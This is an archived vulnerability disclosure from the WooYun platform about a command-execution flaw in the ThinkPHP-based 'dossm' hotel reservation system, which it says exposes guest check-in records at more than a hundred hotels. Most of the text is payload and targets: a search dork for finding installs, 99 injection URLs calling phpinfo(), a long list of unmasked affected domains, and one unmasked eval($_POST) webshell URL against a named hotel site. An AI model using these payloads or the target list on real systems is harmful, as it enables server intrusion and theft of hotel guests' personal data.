乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-25: 细节已通知厂商并且等待厂商处理中 2014-09-28: 厂商已经确认,细节仅向厂商公开 2014-10-01: 细节向第三方安全合作伙伴开放 2014-11-22: 细节向核心白帽子及相关领域专家公开 2014-12-02: 细节向普通白帽子公开 2014-12-12: 细节向实习白帽子公开 2014-12-24: 细节向公众公开
一个漏洞沦陷至少170家酒店及酒店集团(可查开房信息,国庆你还开房吗)御庭酒店集团、钓鱼台、BARONY、欧亚酒店集团、彩虹会、REGALIA、悦华国际、通程国际酒店管理有限公司等当然,不仅仅这几家,数量至少90家酒店及酒店集团,包含全国各地酒店。
全都是使用dossm系统 该系统基于thinkphp开发 存在命令执行漏洞案例:http://www.wintour.cn/case.html广州问途信息技术有限公司谷歌的一个关键字
6到30个字符,不可含 inurl:register.html
这并不是全部影响酒店列表(包括但不限于):
涉及的酒店名单:UC Berkeley - Graduate School of EducationUniversity at Buffalo Department of Physics三亚iHome海景度假公馆中信·博鳌千舟湾度假公寓文轩苑三亚牧海东海大厦帝豪酒店旅行在线神州会通英德仙湖西苑饭店远洋宾馆阳光酒店阳朔酒店阳光酒店- 深圳 东莞迎宾馆天福源酒店广东迎宾馆三亚天域酒店东莞帝豪酒店天域度假酒店帝豪酒店集团广州建国酒店广州建国饭店广州远洋宾馆广州阳光酒店广晟旅业集团御庭酒店集团成都阳光酒店桂山华星酒店深圳阳光酒店远洋集团酒店鲜花满屋客栈深圳阳光酒店 三亚宝宏大酒店三亚石溪墅酒店三亚祈年高尔夫华雅国际大酒店南通市文峰饭店天域长白山酒店广东裕通大酒店广州地中海国际广州木莲庄酒店庐山北斗星酒店张家界阳光酒店深圳求水山酒店珠海德翰大酒店珠海海湾大酒店苏州冠云大酒店远广州远洋宾馆长沙金源大酒店阳朔懒人堂客栈龙源温泉大酒店三亚丽景海湾酒店三亚海韵度假酒店三亚牧海主题酒店三亚珠江花园酒店东莞帝豪花园酒店东莞欧亚国际酒店乐清市金鼎大酒店云浮凯旋国际酒店亚龙湾高尔夫球会北京昆泰嘉华酒店厦门建发旅游集团四会岭南东方酒店广东华师粤海酒店广州华金盾大酒店广州科尔海悦酒店广州逸林假日酒店广州香雪国际酒店成都天府阳光酒店桂林鲜花满屋酒店欧亚国际酒店集团武汉中南花园饭店河南天地粤海酒店海南亚泰温泉酒店美丽之冠管理集团首旅建国酒店管理上海久阳滨江酒店 东莞帝豪花园酒店 广东华师粤海酒店 广州花样年华酒店 成都天府阳光酒店 玉海国际度假酒店 美丽之冠管理集团 北京应物会议中心(花园路店)万年县红万年大酒店三亚中亚国际大酒店三亚天福源度假酒店三亚金棕榈度假酒店常州九洲环宇大酒店广东亚洲国际大酒店广州地中海国际酒店海口黄金海景大酒店深圳宝利来国际大酒重庆仙女山华邦酒店阳朔小清迈精品酒店三亚金棕榈度假酒店 重庆仙女山华邦酒店 三亚亚龙湾高尔夫球会三亚柏瑞精品海景酒店三亚湘投银泰度假酒店君廷酒店及度假村集团四川成都天府阳光酒店张家界禾田居度假酒店深圳宝利来国际大酒店琼海天福源温泉大酒店蓝色海湾海景度假公寓三亚柏瑞精品海景酒店 三亚湘投银泰度假酒店 三亚半山半岛帆船港酒店三亚海蓝蓝海景度假公寓五指山亚泰雨林度假酒店广州嘉鸿华美达广场酒店琼海天福源温泉度假酒店三亚凤凰水城凯莱度假酒店东莞市常平逸豪国际大酒店惠州德泽园(粤海)假日大酒店
1.://**.**.**//www.aihotel.com/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_2.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_3.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_4.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_5.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_6.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_7.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_8.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_9.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_10.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_11.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_12.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_13.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_14.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_15.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_16.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_17.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_18.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_19.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_20.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_21.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_22.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_23.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_24.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_25.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_26.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_27.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_28.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_29.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_30.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_31.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_32.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_33.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_34.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_35.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_36.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_37.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_38.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_39.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_40.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_41.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_42.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_43.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_44.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_45.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_46.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_47.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_48.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_49.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_50.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_51.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_52.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_53.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_54.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_55.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_56.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_57.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_58.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_59.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_60.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_*****0 处^*****61.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_62.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_63.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_64.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_65.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_66.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_67.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_68.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_69.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_70.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_71.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_72.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_73.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_74.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_75.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_76.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_77.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_78.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_79.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_80.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_81.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_82.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_83.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_84.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_85.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_86.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_87.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_88.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_89.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_90.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_91.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_92.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_93.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_94.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_95.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_96.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_97.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_98.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_99.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D</code>
aihotel.combaohonghotel.combaolilai-hotel.combmgcn.comchinameetings.cncnicc.comdehan.test.dossm.comdevpaytmpl3v15.test.dossm.comdgdh.test.dossm.comdggarden.royalhotels.cndgrhm.group.dossm.comdzhgz.comeaselandhotel.comelectron.physics.buffalo.edufhschotel.comguangzhougdhhotel.comgzdhhotel.test.dossm.comhorizon.com.cnhorizonsanya.comhotelsjianguo.comhotelxianjianguo.comhuangdao.lanhai.cnhuangshan.baronyhotels.comhuaponthotel.comhy.yingwu.com.cnhzdzyhotel.test.dossm.comjianguohotelgz.comlaoshan.lanhai.cnlicheng.lanhai.cnlxol.com.cnm.xiyuanhotel.com.cnm.yfkxhotel.commail.resortintime.comoceanhotel.coscohotels.comosresort.cnouyahotels.comprgardenhotel.com.cnqh.tianfuyuan.comqh.wap.tianfuyuan.comqianmenhotel.comresortgp.comresortintime.comrmhgz.cnroyalgardenhotel.com.cnroyalmarinaplaza.comsanya31.comsanyaliking.comsci-apartment.comshizhong.lanhai.cnsunshinehotel.comsunshinehotelzjj.comsxs.resortgp.comsy.tianfuyuan.comsy.wap.tianfuyuan.comszjingdu.comtest.cndhotels.comtest.yeohwahotels.comtfsunshinehotel.comtfyg.test.dossm.comtokaihotel.coscohotels.comvaya-hotel.cnwakingtown-hotel.comwap.skyland-hotel.comwap.soluxehotel.comwhoyhz.test.dossm.comwintour.cnwww-gse.berkeley.eduwww.3496666.comwww.aihotel.comwww.baohonghotel.comwww.baolilai-hotel.comwww.baronyhotels.comwww.bllhotel.comwww.bmgcn.comwww.chinameetings.cnwww.cnicc.comwww.colorfuldays-hotel.comwww.coscohotels.cnwww.coscohotels.comwww.coscohotels.com.cnwww.dgeahotel.comwww.dgybhotel.comwww.dzhgz.comwww.dzyhotel.comwww.easelandhotel.comwww.ebdh-hotel.comwww.eco-hotel.com.cnwww.eversunshinehotel.comwww.fcghotel.comwww.fhschotel.comwww.gbvh.comwww.gdhhotels.comwww.gdyutonghotel.comwww.glamorhotel.comwww.goldenhotel.com.cnwww.goldsourcehotel.comwww.guangzhougdhhotel.comwww.guishanhotel.comwww.hainanyataihotel.comwww.harmonahotel.comwww.hebs.asiawww.horizon.com.cnwww.horizoncbs.comwww.horizonsanya.comwww.hotelsjianguo.comwww.huaponthotel.comwww.hwndjd.comwww.jadesea.cnwww.jbstel.comwww.jianguohotelgz.comwww.jianliharmonyhotel.comwww.jindinghotel.cnwww.joyahotel.cnwww.joyahotel.comwww.kuntairoyalhotel.comwww.lndfhotel-sh.comwww.lphotel.cnwww.lyhotspring.comwww.muhaihotel.comwww.oceanhotel.com.cnwww.osresort.cnwww.ouyahotels.comwww.physics.buffalo.eduwww.pinweijiudian.comwww.prgardenhotel.com.cnwww.qianzhouwan.comwww.qsshotel.comwww.ramadaplazagz.comwww.regalia.com.cnwww.resortgp.comwww.resortintime.comwww.rhgresorts.comwww.risinghotel.comwww.royalgardenhotel.com.cnwww.royalhotels.cnwww.royalmarinaplaza.comwww.sanya31.comwww.sanyabarry.comwww.sanyaliking.comwww.sevenraygolf.comwww.shangrilaassociation.orgwww.singwood.com.cnwww.soluxehotel.comwww.soluxehotelgz.comwww.sunshinehotel.comwww.sunshinehotels.cnwww.sunshinehotelzjj.comwww.szjingdu.comwww.tfsunshinehotel.comwww.themulian.comwww.tianfuyuan.comwww.vaya-hotel.cnwww.wakingtown-hotel.comwww.wenfenghotel.comwww.wintour.cnwww.wmjh.cnwww.wuzhishanyatai.comwww.wx-hotel.comwww.xianhuamanwu.comwww.xiaoqingmai.comwww.xn--sjqu43axxn38f.comwww.xsfd.comwww.yalongbaygolfclub.comwww.yangshuoholiday.comwww.yfkxhotel.comwww.yhihotel.comwww.yingbinhotel.cnwww.ysdidu.comwww.znhyfd.cnwww.zzghhotel.comxitangjiudian.comxiushan.baronyhotels.comyalongbaygolfclub.comysdidu.comzhaolonghotel.com.cn
http://be.btghotels.com/
*****/param1/$%7B*****
*****1/$%7B@print(ev*****
涉及的酒店太多了 数据库如下:
通用http://www.sanya31.com/saas/index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D
危害等级:高
漏洞Rank:17
确认时间:2014-09-28 11:40
暂无